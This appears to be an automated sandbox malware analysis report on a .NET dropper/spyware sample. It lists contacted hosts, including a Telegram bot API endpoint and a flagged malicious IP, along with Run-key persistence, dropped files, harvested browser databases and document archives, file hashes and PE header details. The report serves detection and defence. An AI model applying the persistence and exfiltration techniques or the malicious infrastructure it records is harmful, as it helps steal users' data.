                    https://api.telegram.org/botH | RegAsm.exe, 00000010.00000002.639930266.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.dr | false | | high
                    http://james.newtonking.com/projects/json | RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.carterandcone.coml | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://ac.ecosia.org/autocomplete?q= | tmp3DB7.tmp.tmpdb.16.dr | false | | high
                    https://search.yahoo.com?fr=crmas_sfp | RegAsm.exe, 00000010.00000003.584797810.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.788716199.0000000004AE8000.00000004.00000800.00020000.00000000.sdmp, tmp3DB7.tmp.tmpdb.16.dr | false | | high
                    http://www.fontbureau.com/designers/cabarga.htmlN | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.founder.com.cn/cn | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.fontbureau.com/designers/frere-jones.html | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.jiyu-kobo.co.jp/ | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://www.newtonsoft.com/jsonschema | RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://www.fontbureau.com/designers8 | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.560211581.0000000006D12000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://www.nuget.org/packages/Newtonsoft.Json.Bson | SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    http://api.telegram.org | RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.638281280.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://github.com/novotnyllc/bc-csharp | RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | false | | high
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | tmp3DB7.tmp.tmpdb.16.dr | false | | high
                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                    149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | false
                    41.216.183.235 | unknown | South Africa | | 40676 | AS40676US | true
                                                                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                        Analysis ID:722938
                                                                                        Start date and time:2022-10-14 00:41:27 +02:00
                                                                                        Joe Sandbox Product:CloudBasic
                                                                                        Overall analysis duration:0h 11m 5s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:light
                                                                                        Sample file name:SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                        Number of analysed new started processes analysed:22
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • HDC enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@12/14@3/2
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HDC Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 0
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240s for sample files taking high CPU consumption
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                        • TCP Packets have been reduced to 100
                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                                                                         • Not all processes were analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                         Time      Type              Description
                                                                                         00:43:13  API Interceptor   13x Sleep call for process: powershell.exe modified
                                                                                         00:44:18  Autostart         Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fdmru "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
                                                                                         00:44:19  API Interceptor   1x Sleep call for process: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe modified
                                                                                         00:44:26  Autostart         Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fdmru "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe"
                                                                                         00:45:04  API Interceptor   20x Sleep call for process: RegAsm.exe modified
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1771
                                                                                        Entropy (8bit):5.36045869097821
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MxHKXwYHKhQnoPtHoxHhAHKzv7HLHKdHKBqHK9HK+HKoHK:iqXwYqhQnoPtIxHeqzjrqdq4q9q+qoq
                                                                                        MD5:CD8B08BBE2E11245DC9823F26E788A41
                                                                                        SHA1:76D0BA219B53C1FBB53BA6550671CBA76A59EC48
                                                                                        SHA-256:39F474523EF6F62C60D56AEDFAB8621231C68F87A72E9964C1BEAC375CD248CA
                                                                                        SHA-512:D969E60E90E62D8392C8CA5E8DA7094FD03640F20C1CD8C262B791F5030E1C6BEA106B5A770375AE322C9DD933B5CC30D32D3E6F5D09FD51BA9FEC63E8D4E29C
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicK
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):1720
                                                                                        Entropy (8bit):5.341164372684907
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzvFHDJHoHKKHKdHKBqHKs:Pq5qXEwCYqhQnoPtIxHeqzNVIqKqdq4v
                                                                                        MD5:EF1F211A007660EF4B58A4B249FCA17B
                                                                                        SHA1:343D1C884F8F235B52E4A405694C18D69CC4A1F3
                                                                                        SHA-256:29FFA9E6E3BFB395F8FD3636D1124507329D29057F02CCCF9AD13DB16A6A04B1
                                                                                        SHA-512:88B72598ED70E7A26B00DA94AE73E682AD421BBEAE0B5D318F15C778BEA274CAD06EEC3C3056B3799082C23F47BFEC75D7020BD0D43F8F7A76F52F3ADF245CA9
                                                                                        Malicious:true
                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):5829
                                                                                        Entropy (8bit):4.8968676994158
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                                        MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                                        SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                                        SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                                        SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                                        Malicious:false
                                                                                        Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16520
                                                                                        Entropy (8bit):5.20475272414696
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:nte/aFEz3LJ7TnEwcAMo/nUcmnudlum2P:jFElELALnbmudlL2
                                                                                        MD5:DD18CE2E5568AD30BF58A151F1930838
                                                                                        SHA1:A340BC9B219AD300CFFA14EDD723EB9A7B458B14
                                                                                        SHA-256:99652F4CD5A2D26EEBE0CA02608FB0981E9AE4CD6541EE919AAEF378E6D2BEB9
                                                                                        SHA-512:65C813A7CC27DF6BD5E88C1E4CDE0FC0CC189196877379E0E67CDBBC350B2036C0158C8E55E00423E72E2BC5CDA32C96409E5022D2A29E0A3199DF6F0FAE24D5
                                                                                        Malicious:false
                                                                                        Preview:@...e...............................:.7..............@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview:1
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:very short file (no magic)
                                                                                        Category:dropped
                                                                                        Size (bytes):1
                                                                                        Entropy (8bit):0.0
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:U:U
                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                        Malicious:false
                                                                                        Preview:1
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:Zip archive data (empty)
                                                                                        Category:dropped
                                                                                        Size (bytes):22
                                                                                        Entropy (8bit):1.0476747992754052
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:pjt/l:Nt
                                                                                        MD5:76CDB2BAD9582D23C1F6F4D868218D6C
                                                                                        SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
                                                                                        SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
                                                                                        SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
                                                                                        Malicious:false
                                                                                        Preview:PK....................
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                        Category:dropped
                                                                                        Size (bytes):13484
                                                                                        Entropy (8bit):7.779603538008177
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:5mVbRAuzxhmVbRAuzxYX8aKVuzxhmVbRAuzxhmVbRAuzxYX8aKVuzxGz9:5OAuzrOAuzBaiuzrOAuzrOAuzBaiuz2
                                                                                        MD5:C28913FA838705C12F641433B234E5C7
                                                                                        SHA1:9175697E8341D0F78A751ACD787C9C899E2C6F25
                                                                                        SHA-256:A14D6433AB978474A515A0AE70690F281DE0FC12423F65E6B5EC31988EFB7083
                                                                                        SHA-512:80E18086C354ADBEB695865A411EEFA049FBE6237FA126C79C76A5C340BF958FDD5431BA64243C6CA3EC71642E17A06D3E6B7EF50FE9ED2C6E3BD045C45595C3
                                                                                        Malicious:false
                                                                                        Preview:PK.........t.UR..............AQRFEVRTGL.docx..Gn@1.D..r(W.m0.........f...;!.B........u-..B:.....z.%2.0...w+..{.\q../..%..9..~K....fOMw./..uLT$_..4q.....w.=.r.Y.@......sE...,.!'QG..).y`..YSi....T...|J..\.b..;.4.Z...|.&.G...b..Iz....q6:.Y..&.c}..1.|......\@.....C..r<.E/W.Y.Hc....i.V....N..f.P.<seW...d..>s...B...BA.&..%..7e....p.Tkj.o.4.k..D*<>5@..}v9.Ur...aa..Q2...7w=...W^.,...&.J...'...u8...J....$..D._....jK].vn-.\.v}.e.p_=GO.l....n..v.hZ..{.#..J5......n.R.|..n.Q.J?_..R.t....8......Q.-..3.q.O^.I.i{.RA,D{..e..W....Y.h......,.l4ub...b...(<_.........~..r........C.s|........Jn8..`.-...6i.C?.>...PR..T.T.../i\...8....XQT.e?..!.X.$G.{~..ZZ....L....4....9......?PK.........t.U../.............HMPPSXQPQV.docx..G.@!...S5.........d.-....e.+.yG<v.t..........x.dX.|.......)..e...,X:f.e.,..A.1.R.M.L.}.W.hG+L..v.C..JJ./...0[.0....#.9R.-...z.]....h.@...%..y.)...58.W.c.P.a.p...X..1I..;.*7.`}+T...%.u...,#|7.w.Pf.....98..!.6.,.A.b.V.8.j$l.X.a....7..P.......st.....n
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, file counter 17, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 17
                                                                                        Category:dropped
                                                                                        Size (bytes):28672
                                                                                        Entropy (8bit):1.4755077381471955
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:oesz0Rwhba5DX1tHQOd0AS4mcAMmgAU7MxTWbKSS:o+RwE55tHQOKB4mcmgAU7MxTWbNS
                                                                                        MD5:DEE86123FE48584BA0CE07793E703560
                                                                                        SHA1:E80D87A2E55A95BC937AC24525E51AE39D635EF7
                                                                                        SHA-256:60DB12643ECF5B13E6F05E0FBC7E0453D073E0929412E39428D431DB715122C8
                                                                                        SHA-512:65649B808C7AB01A65D18BF259BF98A4E395B091D17E49849573275B7B93238C3C9D1E5592B340ABCE3195F183943CA8FB18C1C6C2B5974B04FE99FCCF582BFB
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
                                                                                        Category:dropped
                                                                                        Size (bytes):94208
                                                                                        Entropy (8bit):1.2882898331044472
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
                                                                                        MD5:4822E6A71C88A4AB8A27F90192B5A3B3
                                                                                        SHA1:CC07E541426BFF64981CE6DE7D879306C716B6B9
                                                                                        SHA-256:A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
                                                                                        SHA-512:C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):0.7876734657715041
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                                                        MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                                                        SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                                                        SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                                                        SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                                                        Malicious:false
                                                                                        Preview:SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):8192
                                                                                        Entropy (8bit):4.8644449221723445
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:WKeCtTNUT/09Lu/qmJQ9UkL7LoLJ5hPHf+ND:WKxNUTc9Lu/pJQykL7LoLhf+N
                                                                                        MD5:A93394C0D7A32E0AE2BA43A6FD881301
                                                                                        SHA1:B7C51EC181C8751F752E14DBA96132A83EEAA7A8
                                                                                        SHA-256:CB05606B742226130A4E421B47B04BEE21B4DA79BB883C15A3C6A9002D8DFA7D
                                                                                        SHA-512:1645BBFD918C73B7578E0EEF6369C71F88C147391EB5E32A2CEF7E8171F88008689602DA8EB29EDF051119DC01174A0C84D8BB2D464B087DB769335DC8DCD926
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: Virustotal, Detection: 22%, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.................0..............5... ...@....@.. ....................................`..................................4..O....@..\....................`.......4............................................... ............... ..H............text........ ...................... ..`.rsrc...\....@......................@..@.reloc.......`......................@..B.................4......H........#..............03..p...........................................b.(.....(....(....(....&*z.,..{....,..{....o......(....*.0..U........(....."..0A"...As....(......(..... .... ....s....(.....r...p(.....r...po......(....*Z(.....(....s....( ...*..(!...*6.(.....(....*Rs....&(.....{....,.*z.,..{....,..{....o......(....*...0..g........(....."..0A"...As....(......(..... .... X...s....(.....r...p(.....r...po............s"...(#.....(....*..0.._.......($...o%...(...+..o'...-.*.o(
                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):4.8644449221723445
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
                                                                                        File size:8192
                                                                                        MD5:a93394c0d7a32e0ae2ba43a6fd881301
                                                                                        SHA1:b7c51ec181c8751f752e14dba96132a83eeaa7a8
                                                                                        SHA256:cb05606b742226130a4e421b47b04bee21b4da79bb883c15a3c6a9002d8dfa7d
                                                                                        SHA512:1645bbfd918c73b7578e0eef6369c71f88c147391eb5e32a2cef7e8171f88008689602da8eb29edf051119dc01174a0c84d8bb2d464b087db769335dc8dcd926
                                                                                        SSDEEP:192:WKeCtTNUT/09Lu/qmJQ9UkL7LoLJ5hPHf+ND:WKxNUTc9Lu/pJQykL7LoLhf+N
                                                                                        TLSH:1EF1F823E3A85333C66E0F799C53938063BD9327992BCB5F88C5521F5E533210A53BA9
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.................0..............5... ...@....@.. ....................................`................................
                                                                                        Icon Hash:00828e8e8686b000
                                                                                        Entrypoint:0x40350e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xC1D21F41 [Mon Jan 16 06:20:49 2073 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x34bc | 0x4f | .text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x55c | .rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
